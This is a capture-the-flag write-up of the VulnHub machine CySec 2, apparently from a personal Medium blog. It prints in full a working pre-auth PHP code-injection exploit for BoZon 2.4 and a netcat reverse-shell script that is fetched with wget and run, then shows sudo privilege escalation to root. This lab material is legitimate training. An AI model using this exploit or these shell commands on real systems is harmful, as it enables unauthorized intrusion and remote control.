VulnHub: CySec: 2

Today we will take a look at Vulnhub: CySec 2. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open -- open 192.168.0.11522/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b1:00:57:62:be:65:42:f0:ba:3e:c1:47:c5:8d:fb:db (RSA)
| 256 5a:9b:20:89:19:c3:ab:d4:be:06:84:de:e4:30:d4:37 (ECDSA)
|_ 256 08:4b:f3:f8:88:7e:1a:6b:e1:8d:7f:14:60:10:7a:98 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
  • Web

When we look at the source of the page, we see a sentence in encrypted form. Let’s decode it with CyberChef.

view-source:http://192.168.0.115/

Zm9yIGZpcnN0IGZsYWcgY2hlY2sgL2NoYWxsZW5nZS9pbmRleC5waHAKZm9yIHNlY29uZCBmbGFnIGNoZWNrIC9FeG9saXQvaW5kZXgucGhw
for first flag check /challenge/index.php
for second flag check /Exolit/index.php

When we look at /Exolit/index.php, we see that BoZon is version 2.4. After searching, we found the exploit.

  • Exploit
import urllib,urllib2,time

#Bozon v2.4 (bozon.pw/en/) Pre-Auth Remote Exploit
#Discovery / credits: John Page - Hyp3rlinx/Apparition
#hyp3rlinx.altervista.org
#Exploit: add user account | run phpinfo() command
#=========================================================

EXPLOIT=0
IP=raw_input("[Bozon IP]>")
EXPLOIT=int(raw_input("[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()"))

if EXPLOIT==1:
CMD="Apparition"
else:
CMD='"];$PWN=''phpinfo();//''//"'

if EXPLOIT != 0:
url = 'http://'+IP+'/Exolit/index.php'
data = urllib.urlencode({'creation' : '1', 'login' : CMD, 'pass' : 'abc123', 'confirm' : 'abc123', 'token' : ''})
req = urllib2.Request(url, data)

response = urllib2.urlopen(req)
if EXPLOIT==1:
print 'Apparition user account created! password: abc123'
else:
print "Done!... waiting for phpinfo"
time.sleep(0.5)
print response.read()

If we launch the operation, we must first register. So let’s select 1, create a user and log in

└─$ python2 exploit.py
[Bozon IP]>192.168.0.115
[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()1
Apparition user account created! password: abc123

Let’s enter.

username: Apparition

password: abc123

When we refresh the page after selecting the second operation, we encounter such a page.

This is the command that does this.

CMD='"];$PWN=''phpinfo();//''//"'

Let’s use it.

CMD='"];system("ls -la");//''//"'

After changing this section, restart exploit and select the 2nd one. Then refresh the page.

The code has been executed

“You can contact me if you have any questions.”

  • Reverse shell

Let’s prepare such a useful load called reverse.sh

#!/bin/bash 

nc -e /bin/sh YourİP 1234

Now let’s load it on the other side

Local machine

Command: python3 -m http.server 80

In exploit

CMD='"];system("wget http://YourIP/reverse.sh");//''//"'CMD='"];system("bash reverse.sh");//''//"'

Local machine

nc -nvlp 1234

After listening, let’s refresh the page and get the shell.

  • CySec2

If we look at the flag.txt file, we can find the password for cysec2.

Command: cat flag.txt

username = cysec2 
password = $^WAhuy457i6kj

Command: su cysec2

  • Root

Check privileges

Command: sudo -l

(ALL : ALL) ALL

Command: sudo su

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Grand QUBE Liquidity Provider Contest 💚 Distribution Of Rewards 📣

Cyber Security 101

Weternity AirDrop Campaign

KingSwap Airdrop

{UPDATE} Zoom Out Rugby League Quiz Maestro - Close Up Player Word Trivia Hack Free Resources…

ASUS ROG Zephyrus M15 15.6" 4K Ultra HD Gaming Intel Core i7–10750H RTX 2060 1TB

ASUS ROG Zephyrus M15 15.6

How MSPs Use Encryption as an Effective Sales and Lead Generation Tool

Passing data ownership to your app’s customers

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

DAY 1: Injection

An image of a syringe with SQL written on it to signify SQL injection

Try Hack Me : GLITCH

Metasploit: Introduction